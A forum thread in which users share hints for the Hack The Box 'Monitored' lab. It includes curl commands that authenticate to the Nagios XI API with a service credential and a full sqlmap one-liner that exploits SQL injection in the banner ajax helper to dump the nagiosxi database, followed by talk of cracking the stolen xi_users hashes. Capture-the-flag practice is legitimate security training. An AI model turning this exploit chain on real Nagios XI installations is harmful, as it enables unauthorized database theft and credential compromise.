Posts: 148
Threads: 2
Joined: Oct 2023
(Jan 14, 2024, 12:59 AM)ByteBuster Wrote: (Jan 14, 2024, 12:56 AM)peRd1 Wrote: (Jan 14, 2024, 12:33 AM)zeroedbykrycek Wrote: any hint on what to look into after getting the nagios panel using svc creds?  Try finding an sql injection vulnerability and dumb those tables 
Do we need the svc user's token to perform SQL injection? I'm having trouble getting SQL injection to work on the banner URL
That's what you need to work on, that damned banner ajax url... but but but, you need a proper cookie for it.
That auth token is not enough for injection. But it is enough to login to the endpoint. You need to login and grab the proper cookie, use that with sqlmap.
It should make sense.
Posts: 148
Threads: 2
Joined: Oct 2023
Jan 14, 2024, 01:20 AM
(This post was last modified: Jan 14, 2024, 01:21 AM by peRd1.)
(Jan 14, 2024, 01:11 AM)yonigga Wrote: where can i find the auth token??
someone said to me ---> login through the api ---> get the auth_token and visit this in browser to get nagios cookie
Now i have two questions which api??? /nagiosxi/api endpoint?? cause that didn't work. so which one and how to do it?
and visit this in browser to get nagios cookie how???
That person what told you is correct. That is exactly what you need to do.
Maybe intercept the login mechanism? Then use curl. You already have the credentials already. So just login via command line not the GUI.
Then you will have the auth token....that you can use to login from browser... and only then you will have the proper cookie 
Posts: 7
Threads: 0
Joined: Dec 2023
Jan 14, 2024, 03:43 AM
(This post was last modified: Jan 14, 2024, 04:02 AM by arrogant.)
I'm stuck trying to find the token...
edit:
nvm, just found out how -> https://support.nagios.com/forum/viewtop...16&t=58783
Posts: 3
Threads: 0
Joined: Jan 2024
(Jan 14, 2024, 05:00 AM)NothingIsSafe Wrote: (Jan 14, 2024, 01:11 AM)yonigga Wrote: (Jan 14, 2024, 01:07 AM)peRd1 Wrote: (Jan 14, 2024, 12:59 AM)ByteBuster Wrote: (Jan 14, 2024, 12:56 AM)peRd1 Wrote: Try finding an sql injection vulnerability and dumb those tables
Do we need the svc user's token to perform SQL injection? I'm having trouble getting SQL injection to work on the banner URL
That's what you need to work on, that damned banner ajax url... but but but, you need a proper cookie for it.
That auth token is not enough for injection. But it is enough to login to the endpoint. You need to login and grab the proper cookie, use that with sqlmap.
It should make sense.
where can i find the auth token??
someone said to me ---> login through the api ---> get the auth_token and visit this in browser to get nagios cookie
Now i have two questions which api??? /nagiosxi/api endpoint?? cause that didn't work. so which one and how to do it?
and visit this in browser to get nagios cookie how???
curl -i -s -k -X $'POST' \
-H $'Host: nagios.monitored.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' -H $'Content-Length: 54' \
--data-binary $'username=svc&password=XjH7VCehowpR1xZB&valid_min=580\x0d\x0a' \
$'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate'
This also works:
curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'
Posts: 7
Threads: 0
Joined: Dec 2023
glhf
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --dump
Posts: 13
Threads: 0
Joined: Jan 2024
I got some credentials from db by using SQLi, it just looks like shadows file. But i cannot decrypt them with johntheripper. Can someone give me a little hint plz?
Posts: 4
Threads: 0
Joined: Jan 2024
(Jan 14, 2024, 06:31 AM)jyosun Wrote: I got some credentials from db by using SQLi, it just looks like shadows file. But i cannot decrypt them with johntheripper. Can someone give me a little hint plz?
Which table did you find that in?
All the tables I have dumped so far look useless, still in progress though
Posts: 13
Threads: 0
Joined: Jan 2024
(Jan 14, 2024, 06:53 AM)Cmbrlnd Wrote: (Jan 14, 2024, 06:31 AM)jyosun Wrote: I got some credentials from db by using SQLi, it just looks like shadows file. But i cannot decrypt them with johntheripper. Can someone give me a little hint plz?
Which table did you find that in?
All the tables I have dumped so far look useless, still in progress though
table "xi_users" in nagiosxi, but i cannot decrypt the password 
Posts: 3
Threads: 0
Joined: Nov 2023
Posts: 3
Threads: 0
Joined: Jan 2024
(Jan 14, 2024, 06:59 AM)jyosun Wrote: (Jan 14, 2024, 06:53 AM)Cmbrlnd Wrote: (Jan 14, 2024, 06:31 AM)jyosun Wrote: I got some credentials from db by using SQLi, it just looks like shadows file. But i cannot decrypt them with johntheripper. Can someone give me a little hint plz?
Which table did you find that in?
All the tables I have dumped so far look useless, still in progress though
table "xi_users" in nagiosxi, but i cannot decrypt the password
Per HTB's rules, hashes must crack in 5 minutes or less with rockyou.txt so I dont think we're intended to crack these. Basically, if you see a blowfish hash just forget it
|
